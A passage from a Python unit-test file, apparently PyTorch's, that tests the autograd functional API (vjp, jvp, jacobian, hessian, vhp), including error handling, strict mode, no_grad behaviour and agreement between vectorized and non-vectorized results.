self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
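# Under torch.no_grad() the vjp is still computed, but no graph is recorded unless
# create_graph=True is passed explicitly.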
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
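# Illustrative sketch (added for clarity; a hypothetical helper, not part of the original
# suite, relying on the module-level `torch` import used by the surrounding tests). The
# contract asserted above is that the per-input chunks returned by the private
# _construct_standard_basis_for helper, concatenated along dim=1, form an identity matrix
# over the total number of elements. The same structure can be reproduced with public ops
# only; the real helper may be implemented differently:
def _standard_basis_sketch(self):
    numels = [6, 3]  # e.g. hypothetical inputs of shape (2, 3) and (3,)
    total = sum(numels)
    eye = torch.eye(total)
    # one (total, numel_i) block per input; concatenating the blocks restores the identity
    chunks = eye.split(numels, dim=1)
    self.assertTrue(torch.equal(torch.cat(chunks, dim=1), eye))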
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a Python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental-prototype
# warning, because a public-facing API should not emit such a warning
# no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
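# Illustrative usage sketch (added for clarity; a hypothetical helper, not part of the
# original suite). vectorize=True computes the same Jacobian as the default
# element-by-element loop, but batches the work through the vmap prototype mentioned
# above; both paths should agree numerically:
def _jacobian_vectorize_usage_sketch(self):
    def f(x):
        return (x * x).sum(dim=0)  # hypothetical function with a 1-D output
    x = torch.randn(3, 4)
    jac_loop = autogradF.jacobian(f, x, vectorize=False)  # one backward call per output element
    jac_vmap = autogradF.jacobian(f, x, vectorize=True)   # batched via vmap
    self.assertEqual(jac_loop, jac_vmap)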
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.randn([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A linear function for which the Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A linear function for which the Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
